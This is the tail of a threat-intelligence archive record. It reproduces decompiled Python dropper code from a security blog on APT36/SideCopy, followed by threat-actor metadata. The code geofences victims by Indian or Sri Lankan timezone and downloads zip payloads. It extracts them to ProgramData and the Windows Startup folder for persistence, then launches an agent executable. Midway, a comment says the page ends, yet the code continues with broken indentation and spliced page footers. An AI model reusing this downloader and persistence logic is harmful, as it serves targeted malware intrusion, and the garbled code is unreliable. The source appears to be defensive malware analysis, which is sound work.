if os.path.exists(text) is False:\r\n        os.mkdir(text)\r\ndef download_us(url,path):\r\n    if os.path.exists(path) is False:\r\n        urllib.urlretrieve(url,path)\r\n    else:\r\n        print(\"skipping\")\r\n        append_me(\"skipping\")\r\ndef define_me(text):\r\n    try:\r\n        if os.path.exists(text) is True:\r\n            print(\"zip file exists\")\r\n            append_me(\"zip file exists\")\r\n            with zipfile.ZipFile(text, 'r') as zip_ref:\r\n                zip_ref.extractall(\"c:\\\\programdata\\\\WUDFHost\")\r\n        else:\r\n            print(\"not find extracted file\")\r\n            append_me(\"not find extracted file\")\r\n    except Exception as e:\r\n        print(\"already running file\")\r\ndef deaf():\r\n    try:\r\n        if os.path.exists(\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v4.0.30319\") is True:\r\n            download_us(\"http:///WUDFHost45.zip\",\"c:\\\\programdata\\WUDFHost45.zip\")\r\n            define_me(\"c:\\\\programdata\\\\WUDFHost45.zip\")\r\n            pass\r\n        else:\r\n            download_us(\"http:///WUDFHost35.zip\",\"c:\\\\programdata\\WUDFHost35.zip\")\r\n            define_me(\"c:\\\\programdata\\\\WUDFHost35.zip\")\r\n            pass\r\n    except Exception as e:\r\n        print(\"excption in deaf\")\r\ndef openWorkbook(xlapp, xlfile):\r\n    try:\r\n        xlwb = xlapp.Workbooks(xlfile)\r\n        #xlwb.Close(True)\r\n    except Exception as e:\r\n        try:\r\n            xlwb = xlapp.Workbooks.Open(xlfile)\r\n            #xlwb.Close(True)\r\n        except Exception as e:\r\n            print(e)\r\n            xlwb = None\r\n    return(xlwb)\r\ndef define_me_replica(text):\r\n    try:\r\n        if os.path.exists(text) is True:\r\n            print(\"zip file exists\")\r\n            append_me(\"zip file exists\")\r\n            username = os.environ['USERNAME']\r\n            print(username)\r\n            with zipfile.ZipFile(text, 'r') as zip_ref:\r\n                zip_ref.extractall(\"c:\\\\users\\\\\"+username+\"\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\")\r\n        else:\r\n            print(\"not find extracted file\")\r\n            append_me(\"not find extracted file\")\r\n    except Exception as e:\r\n        print(\"already running file\")\r\ndef def_frames():\r\n    try:\r\n        if os.path.exists(\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v4.0.30319\") is True:\r\n            download_us(\"http:///WUDFAgent_45.zip\",\"c:\\\\programdata\\\\WUDFAgent_45.zip\")\r\n            define_me_replica(\"c:\\\\programdata\\\\WUDFAgent_45.zip\")\r\n            pass\r\n        else:\r\n            download_us(\"http:///WUDFAgent_35.zip\",\"c:\\\\programdata\\\\WUDFAgent_35.zip\")\r\n            define_me_replica(\"c:\\\\programdata\\\\WUDFAgent_35.zip\")\r\n            pass\r\n    except Exception as e:\r\n        pass\r\ndef patience_limit():\r\n    try:\r\n        if os.path.exists(\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v4.0.30319\") is True:\r\n            subprocess.Popen([\"c:\\\\programdata\\\\WUDFHost\\\\WUDFAgent.exe\"])\r\n            pass\r\n        else:\r\n            subprocess.Popen([\"c:\\\\programdata\\\\WUDFHost\\\\WUDFAgent.exe\"])\r\n            pass\r\n    except Exception as e:\r\n        pass\r\nif __name__ == '__main__':\r\n    try:\r\n        create_dir(\"c:\\programdata\\WUDFHost\")\r\n        write_me(\"Starter\\n\")\r\n        #list_folders = []\r\n        #list_files = []\r\n        #lines = ''\r\n        username = os.environ['USERNAME']\r\n        #for root, dirs,files in os.walk('c:\\\\users\\\\'+username+'\\\\appdata',topdown=False):\r\n        #    for name in files:\r\n        #        print(os.path.join(root,name))\r\n        #        list_folders.append(os.path.join(root,name))\r\n        #    for name in dirs:\r\n        #        print(os.path.join(root,name))\r\n        #        list_files.append(os.path.join(root,name))\r\n        print(\"Directory Created\")\r\n        if '.py'  not in sys.argv[0]:\r\n            #create_dir(\"c:\\programdata\\WUDFHost\")\r\n            print(\"Directory Created\")\r\n            #write_me(\"Starter\")\r\n            print(\"Log File Created\")\r\n            tzname = time.tzname\r\n            #local_tz = get_localzone()\r\n            print(\"Got the TimeZone\")\r\n            append_me(\"Got the TimeZone : \"+str(tzname) + \"\\n\")\r\n            if \"sri lanka\" in str(tzname).lower() or \"india\" in str(tzname).lower():\r\n                print(\"Correctly Identified TimeZone\")\r\n                if os.path.exists(\"c:\\\\Program Files\\\\Microsoft Office\\\\Office15\")  is True or os.path.exists(\"c:\\\\Program Files\\\\Microsoft Office\\\\Office16\") is True:\r\n                    print(\"Office is 2010 or 2016\")\r\n                    append_me(\"Office is 2010 or 2016\\n\")\r\n                    if is_os_64bit():\r\n                        print(\"Machine is x64\")\r\n                        append_me(\"Machine is x64\\n\")\r\n                        append_me(\"File Downloading Started\\n\")\r\n                        print(\"File Downloading Started\")\r\n                        ##def_frames()\r\n                        append_me(\"All Files Downloaded\\n\")\r\n                        print(\"All Files Downloaded\")\r\n                        deaf()\r\n                        print(\"Files Extracted\")\r\n                        append_me(\"Files Extracted\\n\")\r\n                        print(\"Going for always\")\r\n                        append_me(\"going for always\")\r\n                    else:\r\n                        print(\"Machine is x86\")\r\n                        append_me(\"Machine is x86\\n\")\r\n                        ##def_frames()\r\n                        # the archived page ends here; the rest of the decompiled script is not available
    append_me(\"All Files Downloaded\\n\")\r\n                        print(\"All Files Downloaded\")\r\n                                                                          print(\"Going for always\")\r\n                        append_me(\"going for always\")\r\n                        deaf()\r\n                        print(\"Files Extracted\")\r\n                        append_me(\"Files Extracted\\n\")\r\n                                         else:\r\n                    print(\"Other than Office 16 or Office 13\")\r\nhttps://www.zscaler.com/blogs/security-research/apt-36-uses-new-ttps-and-new-tools-target-indian-governmental-organizations\r\nPage 23 of 24\n\nappend_me(\"Other than Office 16 or Office 13\\n\")\r\n                                         ##def_frames()\r\n                                         append_me(\"All Files Downloaded\\n\")\r\n                    print(\"All Files Downloaded\")\r\n                                                                                   deaf()\r\n                    print(\"Going for always\")\r\n                    append_me(\"going for always\")\r\n                                                                      print(\"Files Extracted\")\r\n                    append_me(\"Files Extracted\\n\")\r\n                list_folders = []\r\n                list_files = []\r\n                for root, dirs,files in os.walk('c:\\\\users\\\\'+username+'\\\\appdata',topdown=False):\r\n                    for name in files:\r\n                        print(os.path.join(root,name))\r\n                        list_folders.append(os.path.join(root,name))\r\n                    for name in dirs:\r\n                        print(os.path.join(root,name))\r\n                        list_files.append(os.path.join(root,name))\r\n                patience_limit()\r\n            else:\r\n                print(\"Not the time Zone You want to run\")\r\n                append_me(\"Not the time Zone You want to 
run\\n\")\r\n        else:\r\n            print(\"Find my self in .py directory\")\r\n            append_me(\"Find my self in .py directory\\n\")\r\n    except Exception as e:\r\n        #append_me(str(e))\r\n        print(str(e))\r\n        append_me(str(e)+\"\\n\")\r\nExplore more Zscaler blogs\r\nSource: https://www.zscaler.com/blogs/security-research/apt-36-uses-new-ttps-and-new-tools-target-indian-governmental-organizations\r\nhttps://www.zscaler.com/blogs/security-research/apt-36-uses-new-ttps-and-new-tools-target-indian-governmental-organizations\r\nPage 24 of 24",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://www.zscaler.com/blogs/security-research/apt-36-uses-new-ttps-and-new-tools-target-indian-governmental-organizations"
	],
	"report_names": [
		"apt-36-uses-new-ttps-and-new-tools-target-indian-governmental-organizations"
	],
	"threat_actors": [
		{
			"id": "187a0668-a968-4cf0-8bfd-4bc97c02f6dc",
			"created_at": "2022-10-27T08:27:12.955905Z",
			"updated_at": "2026-04-10T02:00:05.376527Z",
			"deleted_at": null,
			"main_name": "SideCopy",
			"aliases": [
				"SideCopy"
			],
			"source_name": "MITRE:SideCopy",
			"tools": [
				"AuTo Stealer",
				"Action RAT"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "fce5181c-7aab-400f-bd03-9db9e791da04",
			"created_at": "2022-10-25T15:50:23.759799Z",
			"updated_at": "2026-04-10T02:00:05.3002Z",
			"deleted_at": null,
			"main_name": "Transparent Tribe",
			"aliases": [
				"Transparent Tribe",
				"COPPER FIELDSTONE",
				"APT36",
				"Mythic Leopard",
				"ProjectM"
			],
			"source_name": "MITRE:Transparent Tribe",
			"tools": [
				"DarkComet",
				"ObliqueRAT",
				"njRAT",
				"Peppy"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "a4f0e383-f447-4cd6-80e3-ffc073ed4e00",
			"created_at": "2023-01-06T13:46:39.30167Z",
			"updated_at": "2026-04-10T02:00:03.280161Z",
			"deleted_at": null,
			"main_name": "SideCopy",
			"aliases": [],
			"source_name": "MISPGALAXY:SideCopy",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "b584b10a-7d54-4d05-9e21-b223563df7b8",
			"created_at": "2022-10-25T16:07:24.181589Z",
			"updated_at": "2026-04-10T02:00:04.892659Z",
			"deleted_at": null,
			"main_name": "SideCopy",
			"aliases": [
				"G1008",
				"Mocking Draco",
				"TAG-140",
				"UNC2269",
				"White Dev 55"
			],
			"source_name": "ETDA:SideCopy",
			"tools": [
				"ActionRAT",
				"AllaKore",
				"Allakore RAT",
				"AresRAT",
				"Bladabindi",
				"CetaRAT",
				"DetaRAT",
				"EpicenterRAT",
				"Jorik",
				"Lilith",
				"Lilith RAT",
				"MargulasRAT",
				"ReverseRAT",
				"njRAT"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "abb24b7b-6baa-4070-9a2b-aa59091097d1",
			"created_at": "2022-10-25T16:07:24.339942Z",
			"updated_at": "2026-04-10T02:00:04.944806Z",
			"deleted_at": null,
			"main_name": "Transparent Tribe",
			"aliases": [
				"APT 36",
				"APT-C-56",
				"Copper Fieldstone",
				"Earth Karkaddan",
				"G0134",
				"Green Havildar",
				"Mythic Leopard",
				"Opaque Draco",
				"Operation C-Major",
				"Operation Honey Trap",
				"Operation Transparent Tribe",
				"ProjectM",
				"STEPPY-KAVACH",
				"Storm-0156",
				"TEMP.Lapis",
				"Transparent Tribe"
			],
			"source_name": "ETDA:Transparent Tribe",
			"tools": [
				"Amphibeon",
				"Android RAT",
				"Bezigate",
				"Bladabindi",
				"Bozok",
				"Bozok RAT",
				"BreachRAT",
				"Breut",
				"CapraRAT",
				"CinaRAT",
				"Crimson RAT",
				"DarkComet",
				"DarkKomet",
				"ElizaRAT",
				"FYNLOS",
				"Fynloski",
				"Jorik",
				"Krademok",
				"Limepad",
				"Luminosity RAT",
				"LuminosityLink",
				"MSIL",
				"MSIL/Crimson",
				"Mobzsar",
				"MumbaiDown",
				"Oblique RAT",
				"ObliqueRAT",
				"Peppy RAT",
				"Peppy Trojan",
				"Quasar RAT",
				"QuasarRAT",
				"SEEDOOR",
				"Scarimson",
				"SilentCMD",
				"Stealth Mango",
				"UPDATESEE",
				"USBWorm",
				"Waizsar RAT",
				"Yggdrasil",
				"beendoor",
				"klovbot",
				"njRAT"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "c68fa27f-e8d9-4932-856b-467ccfe39997",
			"created_at": "2023-01-06T13:46:38.450585Z",
			"updated_at": "2026-04-10T02:00:02.980334Z",
			"deleted_at": null,
			"main_name": "Operation C-Major",
			"aliases": [
				"APT36",
				"APT 36",
				"TMP.Lapis",
				"COPPER FIELDSTONE",
				"Storm-0156",
				"Transparent Tribe",
				"ProjectM",
				"Green Havildar",
				"Earth Karkaddan",
				"C-Major",
				"Mythic Leopard"
			],
			"source_name": "MISPGALAXY:Operation C-Major",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434421,
	"ts_updated_at": 1775792210,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/ca2c5d672b73fcdcdabf713bd3d472aa160deac9.pdf",
		"text": "https://archive.orkl.eu/ca2c5d672b73fcdcdabf713bd3d472aa160deac9.txt",
		"img": "https://archive.orkl.eu/ca2c5d672b73fcdcdabf713bd3d472aa160deac9.jpg"
	}
}